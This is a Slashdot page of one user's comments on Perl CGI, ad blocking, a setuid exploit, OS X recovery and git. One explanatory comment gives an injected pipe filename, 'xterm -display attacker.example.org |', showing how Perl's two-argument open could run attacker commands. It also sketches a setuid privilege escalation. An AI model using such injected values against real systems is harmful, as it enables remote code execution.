Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror

Comment Re: Perl (Score 1) 414

Old versions of CGI could be tricked into returning something besides a file handle to $cgi->param( 'file' ). I imagine the exploit worked by using multiple "file" parameters in request. Where the first would be a text string and second would be a uploaded file. The returns of cgi->upload and cgi->param are normally arrays but in scalar context return just the first reverent value. So $cgi->upload( 'file' ) would return a true value but $cgi->param( 'file' ) would return the text from the request as it was before the upload. Perl has two basic forms of the open function. The 2 argument and 3 argument versions. The 3 argument version works more like the C standard system call open, but the two argument function respects piping and redirect characters. So if you got perl to take that user controlled string and treat it as a piped file name say "xterm -display attacker.example.org |" and the perl script just blindly opens that as a filename using the two argument form. ( Hint <...> uses the two argument form internally ) then you can pretty much get the script to run what ever you want. It's one of the reasons that CGI changed how upload files work in current versions, and perl handles <$var> differently than it used to. And also has the <<>> form which does the 3 argument version of open which treats names always as just filenames instead of possibly pipes etc.

Comment Re:Perl (Score 1) 414

CGI.pm is no longer included as part of core with the newest versions of perl and use of alternatives were highly recommended even before it's removal. See CGI::Alternatives for some alternatives. Also the above code seems to use an outdated approach to get upload temporary file handles ( using CGI::param instead of CGI::upload ). It also fails to pass perlcritic at least with the settings I use.

If I was using CGI I'd probably write the above code closer to the following ( dry-coded, untested as I don't have the CGI module installed on my system. )


#!/usr/bin/env perl

use strict;
use warnings;
use CGI;
use Carp;
use English qw{ -no_match_vars };
use Readonly;

Readonly my $BLOCK_SIZE => 1024;

my $cgi = CGI->new();

my ( $handle ) = $cgi->upload( q{file} );

if ( defined $handle ) {
        my $buffer;
        while ( my $bytes = $handle->read( $buffer, $BLOCK_SIZE ) ) {
                print { \*STDOUT } $buffer
                        or croak q{I/O error: }, $ERRNO;
        }
} ## end if ( defined $handle )

1;

Actually the style of my code would be a little different as I like to "use common::sense;" instead of "use strict; use warnings;" and a few other details.

Comment Don't block most, but annoying blocked at router (Score 1) 307

In general I don't block ads; but if some site, java script or the like annoys me enough I will block it at router. Currently I have some auto-play video scripts blocked, some scripts that randomly convert plain text into ad links, and for a while blocked a tracker that really slowed done the webpages. I've also blocked sites ocassionally if their ads or behavior was too annoying. For example I blocked Gizmodo a while back because of that stunt they pulled with TV remotes at some tech conference. In those cases if I end up following a link for some news to a blocked site I just searched for the news and read the story elsewhere. ( Very rare that only one place will talk about something. )

I also don't have flash installed ( and turned off a couple of video codecs that mostly just got used by autoplay videos ) in my main browser which ocassionally causes some sites to show a message accusing me of running an ad blocker where the flash ad would be. ( Surprised at how many sites just assume that a desktop browser must have flash or the like and don't check which codecs are installed. )

Comment Re:I still don't understand (Score 1) 130

newgrp doesn't exit it but executes a child shell which replaces the newgrp process. It's within shell that has access to file descriptor 3.

For why the file needs to have the same setuid is that is what the exploit takes advantage of, normally writing to a setuid file clears the setuid bit, but that doesn't happen if the writer is already root. Which means that using the exploit ( and some tricks to get out of append mode ) someone can turn a setuid file into any program that will run as root when it is launched.

Comment Re:See..... (Score 3, Informative) 130

You can also just boot from an OS X image, for example download the OS X installer extract the installESD.dmg file ( typing from memory but pretty sure that is the name ), install that to a USB drive and boot from it holding the option key when the computer starts up. ( again typing from memory might be command-option or the like ) In fact depending on the age of the computer it might already have a recovery partition that you can just boot directly from and then launch disk utility to mount the main partition and terminal to fix it.

Comment Re:Karma is a bitch (Score 1) 136

And what if I want to bring up two separate branches side-by-side to do some copying? Can't fucking do it in Git.

For side by side comparisions you can always just do a lightweight clone which pretty much should happen automatically if you clone to another directory within the same filesystem, i.e.
git clone -b branch orig_repo branch_repo

Submission + - LibreSSL 2.2.1 Released

An anonymous reader writes: A new version of LibreSSL (2.2.1) has been released, new version includes expanded OS support, code improvements, and bloated feature removal.

Release Notes. modern, safe programming practices. We welcome feedback and improvements from the broader community. Thanks to all of the contributors who helped make this release possible.

Comment Re:One more in a crowded field (Score 1) 337

Just like they plan on open-sourcing Facetime?

Most likely, and if something similar to the patient issue with FaceTime crops up I wouldn't be surprised on a reversed course similar to what happened with FaceTime. That said I'm assuming that the hints that they wanted to open source the language at it's introduction combined with delay between then and the announcement of planning to open source meant they may have taken steps to avoid such issues this time.

Slashdot Top Deals

Power corrupts. And atomic power corrupts atomically.

Working...